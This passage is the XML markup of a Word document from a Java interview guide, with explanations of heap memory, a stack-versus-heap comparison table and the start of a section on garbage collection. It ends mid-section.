      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="00C642E9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>eap memory in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="5512327D" w14:textId="1D12C66C" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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Heap Memory in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3627C2C6"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in Java is the portion of memory used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic memory allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, where all </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 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lass instanc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re stored during runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67E5D8"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A4C59">
          <v:rect id="_x0000_i1282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E966FC"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6579"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="38E14BDC" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F20B162"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441BC4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088A" w:rsidRPr="00CE4B95" w14:paraId="3CB63C2C" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3627FCC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37185D0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all objects and their instance variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="51A4E583" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362F414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4DE7D360"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live in heap as long as they are reachable (not garbage collected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="53492B0A" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E05B20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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B8C5FE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is shared among all threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="49F6F8D3" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="390508F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1356F2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irtual Machine (JVM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="208E5872" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B48A93"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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0334EDA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automatically cleans up unreachable objects in heap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FE3BE0C"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FCB93">
          <v:rect id="_x0000_i1283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE986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goes into the Heap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A1457"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reated using new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B34C9"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s (int[], String[], etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304BB25"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stances (Student s = new Student();)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C2FCC"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s not in the string constant pool (e.g., new String("abc"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28124A50"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186B1">
          <v:rect id="_x0000_i1284" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9ACCD"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E270C7A"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emo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1677F1"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04274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Java"); // stored in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12648B2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rr = new int[10];          // array also stored in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363AB99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EDF98C"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8B2BBB"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nd arr point to heap objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17195D6F"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s name and arr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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43221D27"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9084D">
          <v:rect id="_x0000_i1285" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC532FE"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eap Memory Management Phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41FB3D"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p w14:paraId="04501926"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objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE16CF2"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Eden and Survivor spaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D44D9"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p>
    <w:p w14:paraId="3BE716DE"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ing objects promoted from Young Gen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B651AEA"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Java 8+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C65BCC"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metadata (previously part of PermGen)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC8451"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016D7">
          <v:rect id="_x0000_i1286" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2CDDC9"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 in Heap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745310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VM automatically reclaims memory from unreachable objects in heap via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7475A3B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 strategy (like G1GC, CMS, etc.) depends on the JVM configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C09DF" w14:textId="61B83C88"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967E490">
          <v:rect id="_x0000_i1287" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC36CB" w14:textId="77777777" w:rsidR="00BB57EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB57EF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc197867316"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Stack and Heap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="057DEF7E" w14:textId="39D07D3F" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F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concise comparison of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stack vs Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B596D6B"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A34C1">
          <v:rect id="_x0000_i1288" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C78800"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828"/>
        <w:gridCol w:w="4477"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="66C080CC" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B93194"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AFE2D6"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0E9E3769"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F709F7" w:rsidRPr="00CE4B95" w14:paraId="23AA6FBC" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="021A012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AAB165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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="508544B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class instances, arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="5796F4DC" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C8D42C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3248CBE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mory allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC41CF0"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memory allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="5C4AFF31" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="553C754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0B6D4C4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LIFO - Last In First Out)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B147EA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than stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="60F79644" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="442CDBD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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FA5CD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to the method/thread</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AC84B2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obal (shared across all threads unless marked thread-local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="031D137B" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="154CA8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38D657D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each thread has its own stack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F51B1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s synchronization for thread safety)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="690471CE" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D810C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2ABC36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till the method completes execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="117FA5B3"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exist until garbage collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="79EED5F8" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8EEB5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Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07E82E7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rimitive local variables- References to objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="714B89B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ctual objects- Arrays- Instance variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="1F864604" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A93769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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="663A580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automatically via function calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6750BD9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 Garbage Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="30383FE4" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D38BA1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flow Possibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04486F8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 if stack is full</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69EC7B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if heap is exhausted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78F7D5D5"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869401">
          <v:rect id="_x0000_i1289" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D33B92"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0A13F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4500C9A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46047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x is stored in Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26DA0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Hi"); // "Hi" object in Heap, 'name' reference in Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87BF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C6790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1D0A1C"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88D34">
          <v:rect id="_x0000_i1290" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819997B"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921DE32"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r lightweight operations (method calls, temporary variables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53560E30"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n creating objects that need to persist beyond the method scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909F8E2" w14:textId="05B833D1"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9DC5BF">
          <v:rect id="_x0000_i1291" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D81E1" w14:textId="03E154D0" w:rsidR="00D569F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D569F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc197867317"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00AB178F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">arbage </w:t>
      </w:r>
      <w:r w:rsidR="00FD7658" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ollection in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="23B5B1FD" w14:textId="0DD38278" w:rsidR="002B008F" w:rsidRPr="00CE4B95"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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of identifying and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reclaiming memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by objects that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no longer reachable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or needed by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C79FA0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performed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM (Java Virtual Machine)</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free up heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and prevent memory leaks, so developers don't have to manually manage memory (unlike in C/C++).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F21EC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GC Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5892A1E9"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vents </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A52B8"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rees memory from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unused objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002425FA"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roves </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
